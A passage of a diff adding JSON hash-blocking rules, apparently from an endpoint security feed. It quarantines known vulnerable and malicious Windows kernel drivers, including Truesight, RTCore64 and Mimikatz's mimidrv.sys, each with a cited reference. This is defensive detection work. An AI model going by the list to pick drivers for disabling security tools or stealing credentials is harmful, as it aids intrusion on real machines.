+ "value": "34c0711fb9ddeaea1bab040fb4b3bbf3f50039164aaad0de0764b52201866058",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3521921b-1b96-5f11-ab1d-517ac1710d12",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982503Z",
+ "creation_date": "2026-03-23T11:45:29.982505Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982510Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d60819f0ab8547dcd4eb18d39a0c317ec826332afa19c0a6af94bc681a21f14",
+ "comment": "Vulnerable Kernel Driver (aka 1.sys) [https://www.loldrivers.io/drivers/a5792a63-ba77-44ac-bd4a-134b24b01033/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "352befa1-64ae-580a-a206-33dd8ccecbe0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498146Z",
+ "creation_date": "2026-03-23T11:45:31.498150Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f0b37c4ce0ba64bc3ae08f1443ef73ca7e47a3f3db145b7d243618c1f988c7be",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "353ac27c-b6b1-5840-ace4-0791124e9cc2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817488Z",
+ "creation_date": "2026-03-23T11:45:30.817490Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817496Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5449e4dd1b75a7d52922c30baeca0ca8e32fe2210d1e72af2a2f314a5c2268fb",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "354c0ecc-23ff-506e-96f4-ef5df72cc8ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476050Z",
+ "creation_date": "2026-03-23T11:45:30.476054Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476062Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0cfb7ea2cc515a7fe913ab3619cbfcf1ca96d8cf72dc350905634a5782907a49",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3555aa25-191a-5814-96b2-7500165dbaf0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967729Z",
+ "creation_date": "2026-03-23T11:45:29.967731Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967736Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3876e1d070de070ca46423d1a444da1906a7e8136288dce76c840010017a47c9",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35622616-b5d4-5c21-8be9-d88dd5e4e457",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820213Z",
+ "creation_date": "2026-03-23T11:45:30.820215Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ 
"hl_testing_start_time": "2026-03-23T11:45:30.820221Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ddcca718ae393cf1d3fd57ddd648484b97c95086bc1c77c6e00d8cd86d60bd8", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "356b6fe3-c6a2-5ef9-ae0c-9457fde490c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492979Z", + "creation_date": "2026-03-23T11:45:31.492982Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492990Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5a0c2b8f072d58a7ed0d774a6d9329f55819a478e97aa568bfc955e5ff4c698c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "356cea6f-9112-5831-afb6-38afc6be9321", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474235Z", + "creation_date": "2026-03-23T11:45:31.474239Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474247Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9d48724981a38495983357464c6c16a1d911b7d7ba9730f33b6042bb71720c08", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "35712b77-88a5-5480-89c2-192b8335477b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607650Z", + "creation_date": "2026-03-23T11:45:29.607652Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607657Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "6cb6e23ba516570bbd158c32f7c7c99f19b24ca4437340ecb39253662afe4293", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "35877ffd-4776-55b0-9e27-8c803d45725e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975006Z", + "creation_date": "2026-03-23T11:45:29.975008Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975013Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "60571dbcaec96d9517e0d116d066e70ae747aa4396d7857b2eea0f4c1a5a70b4", + "comment": "Vulnerable Kernel Driver (aka amsdk.sys) [https://www.loldrivers.io/drivers/a285591e-ad3c-46a3-a648-c58589ff5efc/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "35989926-1906-5f9d-8df1-3145313f48c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823233Z", + "creation_date": "2026-03-23T11:45:31.823236Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823245Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fc46e5b6b1ffaca1d534f3c2d7e1f98200c8e75980ab5abd58b7142604c99696", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3598f70a-ec31-5253-85a8-775e57057167", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818186Z", + "creation_date": "2026-03-23T11:45:31.818189Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818198Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "57c8bbdc617fea993266198ade9cd04582df9d8f896abaa011d3d97574046b37", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "359bbb5b-f054-5600-8f9a-5e9a5263623e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466807Z", + "creation_date": "2026-03-23T11:45:30.466810Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466819Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "af7ca247bf229950fb48674b21712761ac650d33f13a4dca44f61c59f4c9ac46", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "35adc59f-0107-5b67-a529-f5534c6bcaed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144110Z", + "creation_date": "2026-03-23T11:45:32.144112Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144118Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2c1b65c2988b337182f1ba57b404793454e30a7fd328d34bc2e79857dc437a4a", + "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "35b136ac-5d61-5fdb-9255-8efde8d6d7c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463184Z", + "creation_date": "2026-03-23T11:45:30.463187Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463195Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6d68d8a71a11458ddf0cbb73c0f145bee46ef29ce03ad7ece6bd6aa9d31db9b7", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "35b3c963-847d-5ac0-aca8-ee66eca51cc5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834159Z", + "creation_date": "2026-03-23T11:45:30.834162Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834171Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "882d4bde14f068076056098a7e097b026a548a6cd6b2604daec846f5483f9866", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "35b65d15-d767-56aa-b9d6-b17d5e8a7167", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813061Z", + "creation_date": "2026-03-23T11:45:31.813064Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813073Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "552607a739ca2833a5800fe65f04febc3fc9531f8cd17dc562da487572e7672a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "35bd1c57-2937-5b33-9c5c-65b4688edc05", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462086Z", + "creation_date": "2026-03-23T11:45:30.462089Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462098Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "36f45a42ebf2de6962db92aaf8845d7f9fd6895bedc31422adcf31c59a79602d", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "35bf3bf1-a259-5d3d-a4bb-8cb9536f0809", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": 
{ + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814689Z", + "creation_date": "2026-03-23T11:45:31.814692Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814701Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "895aecc148a913118019ace4656a71d5bf3c0c87bb7ffb96de409dba5bdd828e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "35cad061-e719-5edf-823c-41001ed39cd8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810663Z", + "creation_date": "2026-03-23T11:45:31.810665Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810671Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "323661cc6e15eb48e21c097c53253409f3637a1fff408a116bd828c4611ce3bc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "35d445ee-725a-534f-a66b-cd82b07165de", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146638Z", + "creation_date": "2026-03-23T11:45:32.146640Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146646Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "37d07c39dc10ae82a9d292c74f7c5f93c7bc133a0225402dafc21f664af079b6", + "comment": "Resigned Vulnerable TfSysMon driver used by ValleyRAT (aka amdi2c.sys and tProtect.dll) [https://x.com/anylink20240604/status/1905691075639222521] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "35d62fe6-8104-586e-8f42-a2139d4f5052", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819795Z", + "creation_date": 
"2026-03-23T11:45:30.819797Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819802Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "837d3b67d3e66ef1674c9f1a47046e1617ed13f73ee08441d95a6de3d73ee9f2", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "35df2083-1e20-58af-b412-8eaf849d1e72", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811580Z", + "creation_date": "2026-03-23T11:45:31.811583Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811591Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d9bce72c8f8817de3028795f07f1cea6dfc0143860acce73f21ceffcb82fc899", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "35e0a09d-4293-5a71-bc4d-71275842b875", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824726Z", + "creation_date": "2026-03-23T11:45:31.824728Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824733Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7565d7f7b811d658278b511b5334a6cd21f551b31d180cc6efddd515ed793c74", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 